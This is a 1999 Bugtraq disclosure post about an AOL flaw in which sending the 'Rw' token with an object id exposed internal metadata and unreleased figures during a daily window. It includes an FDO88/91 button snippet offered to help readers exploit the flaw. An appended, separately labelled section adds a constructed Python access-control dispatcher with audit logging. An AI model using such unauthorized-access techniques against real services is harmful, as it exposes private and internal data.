[10982] in bugtraq
America Online Token Hole
daemon@ATHENA.MIT.EDU (Kevin Mack)
Fri Jul 9 05:25:58 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Message-Id: <001401bec955$2a200fe0$7872ba8c@krok>
Date: Thu, 8 Jul 1999 11:18:33 -0400
Reply-To: Kevin Mack <mackk@RPI.EDU>
From: Kevin Mack <mackk@RPI.EDU>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Normally I wouldn't post things of this nature, but I thought it was important enough. About a year ago, I found out that by sending the "Rw" token to the AOL host while signed on, along with the object's internal id as arg, any user could get detailed info about any object on the system. Included in this information is the user who created the object and tons of other information like its current viewrule and AOL url. This was all great for about a week until AOL officially fixed the hole. Normally only internal users are allowed such access for security reasons. Using this exploit, anyone can see headings in AOL's Network Operations Center and look at user count information and AOL monthly profits before they are even released. AOL put all their stuff online... Anyways, the hole still exists but is windowed for only about an hour a day. I have no clue why and it seems random... For example, yesterday, July 7th, it existed between 6:30-7:30PM EST.

Here is a sample FDO88/91 that will create a button to send the Rw token with arg and help you exploit... Fill the internal id with any number you wish to see... I do have a listing of interesting ids if anyone wants to follow this further... and good luck with the timing...
man_start_object < trigger, "" >
mat_relative_tag < 22 >
act_replace_select_action
<
uni_start_stream
sm_send_token_arg <"Rw", INTERNAL ID HERE>
uni_end_stream
>
mat_precise_x < 0 >
mat_precise_y < 226 >
mat_font_sis < small_fonts, 7, normal>
mat_art_id < 1-0-21184 >
mat_bool_default < yes >
man_end_object
Comments, questions: mackk@rpi.edu
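The defect the post describes is an authorization check that is applied to the "Rw" token only intermittently, so object metadata meant for internal staff leaks to any signed-on user during the unprotected window. The following is an added illustration, not part of the original post and not AOL's code: a hypothetical token dispatcher that applies the "internal users only" rule in one place on every request, independent of time of day, and records denied attempts so that repeated probing of the privileged token can be spotted. The object table, user names, object ids, the audit threshold and the handler names are all constructed for the example.

```python
# Added illustration (hypothetical server-side dispatcher; not AOL's code).
# The rule the post states, "only internal users are allowed such access",
# is enforced centrally before any handler runs, rather than inside an
# individual handler where it can be bypassed or applied inconsistently.

from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class Session:
    user: str
    internal: bool  # True only for staff (internal) accounts


# Constructed stand-in for the host's object table: internal id -> metadata.
OBJECTS: Dict[int, Dict[str, str]] = {
    12345: {"creator": "staff_account", "viewrule": "internal", "url": "<url placeholder>"},
    67890: {"creator": "member_a", "viewrule": "public", "url": "<url placeholder>"},
}

# Tokens that return internal object metadata; each requires an internal session.
PRIVILEGED_TOKENS = {"Rw"}

# Denied privileged requests: (user, token, argument). Feeds the detection check below.
audit_log: List[Tuple[str, str, str]] = []


def handle_rw(session: Session, arg: int) -> dict:
    """Return the metadata record for an object id (hypothetical Rw handler)."""
    obj = OBJECTS.get(arg)
    if obj is None:
        return {"error": "no such object"}
    return dict(obj)


HANDLERS: Dict[str, Callable[[Session, int], dict]] = {"Rw": handle_rw}


def dispatch(session: Session, token: str, arg: int) -> dict:
    """Route a token to its handler, enforcing the privilege check first, every time."""
    handler = HANDLERS.get(token)
    if handler is None:
        return {"error": "unknown token"}
    if token in PRIVILEGED_TOKENS and not session.internal:
        # Deny and record: a non-internal session asked for internal-only data.
        audit_log.append((session.user, token, str(arg)))
        return {"error": "not authorized"}
    return handler(session, arg)


def suspicious_users(log: List[Tuple[str, str, str]], threshold: int = 3) -> List[str]:
    """Users with at least `threshold` denied privileged-token requests (constructed threshold)."""
    counts: Dict[str, int] = {}
    for user, _token, _arg in log:
        counts[user] = counts.get(user, 0) + 1
    return sorted(u for u, c in counts.items() if c >= threshold)


if __name__ == "__main__":
    member = Session("member_b", internal=False)
    staff = Session("staff_account", internal=True)
    print(dispatch(member, "Rw", 12345))   # denied regardless of time of day
    print(dispatch(staff, "Rw", 12345))    # internal session sees the record
    for _ in range(3):
        dispatch(member, "Rw", 67890)
    print(suspicious_users(audit_log))     # ['member_b']
```

The design point is that the privilege decision lives in `dispatch`, not in `handle_rw`: a handler that is reachable at all is reachable only after the check, so there is no configuration or scheduling path that exposes it without the check. The audit log is what a defender would watch; a member account repeatedly issuing a privileged token is the signal the post's "timing" game would produce.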